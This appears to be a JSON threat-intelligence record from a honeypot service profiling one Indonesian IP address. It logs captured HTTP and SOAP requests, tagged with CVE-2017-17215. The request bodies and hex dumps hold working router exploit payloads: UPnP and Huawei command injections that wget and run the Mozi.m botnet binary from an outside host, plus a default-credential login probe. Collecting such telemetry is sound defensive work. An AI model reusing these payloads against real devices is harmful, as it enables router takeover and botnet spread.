{"ip":"180.244.187.139","total_events":4,"verdict":{"verdict":"probing","label":"Low-level probing","detail":null,"confidence":"low","network_type":"nsp"},"first_seen":"2026-06-12T12:16:00","last_seen":"2026-06-24T05:22:38","events_24h":0,"events_7d":1,"geo":{"country_code":"ID","country_name":"Indonesia","region":"West Java","city":"Bekasi","lat":-6.265,"lon":107.0122,"asn":7713,"org":"PT Telekomunikasi Indonesia"},"source_domain":null,"known_scanners":[],"scanner_tag":{"key":"peeringdb:as7713","label":"Telekomunikasi Indonesia Int (TELIN)","category":"isp","url":"https://www.peeringdb.com/asn/7713"},"cve_matches":[{"cve_id":"CVE-2017-17215","title":"Huawei Router UPnP RCE / Mozi","severity":"CRITICAL","actively_exploited":false,"match_field":"url_path","matched_pattern":"DeviceUpgrade_1"}],"top_ports":[{"port":80,"proto":"tcp","label":"HTTP","count":2},{"port":37215,"proto":"tcp","label":"","count":1},{"port":52869,"proto":"tcp","label":"","count":1}],"fingerprints":{"ssh_hassh":[],"tls_ja4":[],"tls_ja3":[],"ja4h":["ge10nn0000_000000000000","po11nn0600_ffcaea4c1bb5","po11nn0400_829cc7acbb47"]},"fingerprint_peers":{"po11nn0400_829cc7acbb47":21,"ge10nn0000_000000000000":2041,"po11nn0600_ffcaea4c1bb5":20},"user_agents":["Hello-World"],"timeline":[{"date":"2026-06-12","count":2},{"date":"2026-06-14","count":1},{"date":"2026-06-24","count":1}],"recent_events":[{"timestamp":"2026-06-24T05:22:38","port":52869,"proto":"tcp","app_proto":"","app_protocol":"http","host":"","headers":"{\"accept\":\"/\",\"accept-encoding\":\"gzip, deflate\",\"connection\":\"keep-alive\",\"content-length\":\"630\",\"soapaction\":\"urn:schemas-upnp-org:service:WANIPConnection:1#AddPortMapping\",\"user-agent\":\"Hello-World\"}","body":"47450TCP44382cd /var/; wget http://180.244.187.139:36196/Mozi.m; chmod +x Mozi.m; ./Mozi.m1syncthing0\r\n\r\n","sni":"","tls_cipher":"","tls_version":"","alpn":[],"url_path":"/picsdesc.xml","summary":"","payload_hex":"504f5354202f70696373646573632e786d6c20485454502f312e310d0a436f6e74656e742d4c656e6774683a203633300d0a4163636570742d456e636f64696e673a20677a69702c206465666c6174650d0a534f4150416374696f6e3a2075726e3a736368656d61732d75706e702d6f72673a736572766963653a57414e4950436f6e6e656374696f6e3a3123416464506f72744d617070696e670d0a4163636570743a202f0d0a557365722d4167656e743a2048656c6c6f2d576f726c640d0a436f6e6e656374696f6e3a206b6565702d616c6976650d0a0d0a3c3f786d6c2076657273696f6e3d22312e3022203f3e3c733a456e76656c6f706520786d6c6e733a733d22687474703a2f2f736368656d61732e786d6c736f61702e6f72672f736f61702f656e76656c6f70652f2f2220733a656e636f64696e675374796c653d22687474703a2f2f736368656d61732e786d6c736f61702e6f72672f736f61702f656e636f64696e672f223e3c733a426f64793e3c753a416464506f72744d617070696e6720786d6c6e733a753d2275726e3a736368656d61732d75706e702d6f72673a736572766963653a57414e4950436f6e6e656374696f6e3a31223e3c4e657752656d6f7465486f73743e3c2f4e657752656d6f7465486f73743e3c4e657745787465726e616c506f72743e34373435303c2f4e657745787465726e616c506f72743e3c4e657750726f746f636f6c3e5443503c2f4e657750726f746f636f6c3e3c4e6577496e7465726e616c506f72743e34343338323c2f4e6577496e7465726e616c506f72743e3c4e6577496e7465726e616c436c69656e743e6364202f7661722f3b207767657420687474703a2f2f3138302e3234342e3138372e3133393a33363139362f4d6f7a692e6d3b2063686d6f64202b78204d6f7a692e6d3b202e2f4d6f7a692e6d3c2f4e6577496e7465726e616c436c69656e743e3c4e6577456e61626c65643e313c2f4e6577456e61626c65643e3c4e6577506f72744d617070696e674465736372697074696f6e3e73796e637468696e673c2f4e6577506f72744d617070696e674465736372697074696f6e3e3c4e65774c656173654475726174696f6e3e303c2f4e65774c656173654475726174696f6e3e3c2f753a416464506f72744d617070696e673e3c2f733a426f64793e3c2f733a456e76656c6f70653e0d0a0d0a","method":"POST","user_agent":"Hello-World","community_id":"1:en2D0oTGhrU43mMW9uAB+FqwLts=","ja3":"","session":"5ca26230-9b46-49d8-b036-f594e78cd942","seq":1,"duration_ms":100,"bytes_in":879,"bytes_out":80},{"timestamp":"2026-06-14T19:18:16","port":37215,"proto":"tcp","app_proto":"","app_protocol":"http","host":"","headers":"{\"authorization\":\"Digest username=\\\"dslf-config\\\", realm=\\\"HuaweiHomeGateway\\\", nonce=\\\"88645cefb1f9ede0e336e3569d75ee30\\\", uri=\\\"/ctrlt/DeviceUpgrade_1\\\", response=\\\"3612f843a42db38f48f59d2a3597e19c\\\", algorithm=\\\"MD5\\\", qop=\\\"auth\\\", nc=00000001, cnonce=\\\"248d1a2560100669\\\"\",\"connection\":\"keep-alive\",\"content-length\":\"601\",\"host\":\":37215\"}","body":"$(/bin/busybox wget -g 180.244.187.139:52277 -l /tmp/huawei -r /Mozi.m;chmod -x huawei;/tmp/huawei huawei)$(echo HUAWEIUPNP)","sni":"","tls_cipher":"","tls_version":"","alpn":[],"url_path":"/ctrlt/DeviceUpgrade_1","summary":"","payload_hex":"504f5354202f6374726c742f446576696365557067726164655f3120485454502f312e310d0a486f73743a203a33373231350d0a436f6e74656e742d4c656e6774683a203630310d0a436f6e6e656374696f6e3a206b6565702d616c6976650d0a417574686f72697a6174696f6e3a2044696765737420757365726e616d653d2264736c662d636f6e666967222c207265616c6d3d22487561776569486f6d6547617465776179222c206e6f6e63653d223838363435636566623166396564653065333336653335363964373565653330222c207572693d222f6374726c742f446576696365557067726164655f31222c20726573706f6e73653d223336313266383433613432646233386634386635396432613335393765313963222c20616c676f726974686d3d224d4435222c20716f703d2261757468222c206e633d30303030303030312c20636e6f6e63653d2232343864316132353630313030363639220d0a0d0a3c3f786d6c2076657273696f6e3d22312e3022203f3e3c733a456e76656c6f706520786d6c6e733a733d22687474703a2f2f736368656d61732e786d6c736f61702e6f72672f736f61702f656e76656c6f70652f2220733a656e636f64696e675374796c653d22687474703a2f2f736368656d61732e786d6c736f61702e6f72672f736f61702f656e636f64696e672f223e3c733a426f64793e3c753a5570677261646520786d6c6e733a753d2275726e3a736368656d61732d75706e702d6f72673a736572766963653a57414e505050436f6e6e656374696f6e3a31223e3c4e657753746174757355524c3e24282f62696e2f62757379626f782077676574202d67203138302e3234342e3138372e3133393a3532323737202d6c202f746d702f687561776569202d72202f4d6f7a692e6d3b63686d6f64202d78206875617765693b2f746d702f68756177656920687561776569293c2f4e657753746174757355524c3e3c4e6577446f776e6c6f616455524c3e24286563686f2048554157454955504e50293c2f4e6577446f776e6c6f616455524c3e3c2f753a557067726164653e3c2f733a426f64793e3c2f733a456e76656c6f70653e","method":"POST","user_agent":"","community_id":"1:MJQxbI0/nRiy1rvnzQMP05iKqsU=","ja3":"","session":"ba57b9fe-4dfa-4823-84e9-a2b4311daec3","seq":1,"duration_ms":100,"bytes_in":813,"bytes_out":80},{"timestamp":"2026-06-12T12:16:00","port":80,"proto":"tcp","app_proto":"","app_protocol":"","host":"","headers":"","body":"","sni":"","tls_cipher":"","tls_version":"","alpn":[],"url_path":"","summary":"20http://%s:%d/Mozi.m%20-O%20->%20/tmp/Netlink.m;chmod%20777%20/tmp/Netlink.m;/tmp/Netlink.m&waninf=1_INTERNET_R_VID_154 HTTP/1.0\r\n\r\n","payload_hex":"3230687474703a2f2f25733a25642f4d6f7a692e6d2532302d4f2532302d3e2532302f746d702f4e65746c696e6b2e6d3b63686d6f642532303737372532302f746d702f4e65746c696e6b2e6d3b2f746d702f4e65746c696e6b2e6d2677616e696e663d315f494e5445524e45545f525f5649445f31353420485454502f312e300d0a0d0a","method":"","user_agent":"","community_id":"1:SjfHkpIjyDd177W+R3Gavjx0QUQ=","ja3":"","session":"727a9ddd-ebc2-496c-97e6-ed50228dc6a7","seq":2,"duration_ms":342,"bytes_in":197,"bytes_out":95,"enriched":{"digest":"69dda84fbae568b6","strings":["20http://%s:%d/Mozi.m%20-O%20->%20/tmp/Netlink.m;chmod%20777%20/tmp/Netlink.m;/t…"],"iocs":{"urls":["http://%s:%d/Mozi.m%20-O%20-"],"paths":["/tmp/Netlink.m"]}}},{"timestamp":"2026-06-12T12:16:00","port":80,"proto":"tcp","app_proto":"","app_protocol":"http","host":"","headers":"","body":"","sni":"","tls_cipher":"","tls_version":"","alpn":[],"url_path":"/boaform/admin/formLogin?username=user&psd=user","summary":"","payload_hex":"474554202f626f61666f726d2f61646d696e2f666f726d4c6f67696e3f757365726e616d653d75736572267073643d7573657220485454502f312e300d0a0d0a","method":"GET","user_agent":"","community_id":"1:SjfHkpIjyDd177W+R3Gavjx0QUQ=","ja3":"","session":"727a9ddd-ebc2-496c-97e6-ed50228dc6a7","seq":1,"duration_ms":100,"bytes_in":64,"bytes_out":80}],"http_methods":[{"method":"POST","count":2},{"method":"GET","count":1}],"distinct_ports_total":3,"top_paths":[{"path":"/picsdesc.xml","count":1,"ports":1},{"path":"/ctrlt/DeviceUpgrade_1","count":1,"ports":1},{"path":"/boaform/admin/formLogin?username=user&psd=user","count":1,"ports":1}],"distinct_paths_total":3,"top_snis":[],"top_hosts":[],"top_alpns":[],"banners":[],"credentials":[],"header_profile":{"signature":["Accept","Accept-Encoding","Connection","Content-Length","Soapaction","User-Agent"],"representative":[{"name":"Accept","value":"/","notable":false},{"name":"Accept-Encoding","value":"gzip, deflate","notable":false},{"name":"Connection","value":"keep-alive","notable":false},{"name":"Content-Length","value":"630","notable":false},{"name":"Soapaction","value":"urn:schemas-upnp-org:service:WANIPConnection:1#AddPortMapping","notable":false},{"name":"User-Agent","value":"Hello-World","notable":false}],"distinct_sets":2,"events_with_headers":2},"tags":[{"tag_id":"CVE-2017-17215","tag_type":"cve","title":"Huawei Router UPnP RCE / Mozi","severity":"CRITICAL","actively_exploited":false,"match_field":"url_path","matched_pattern":"DeviceUpgrade_1","reference_urls":[]}],"data_as_of":"2026-06-25T05:47:06.259263+00:00"}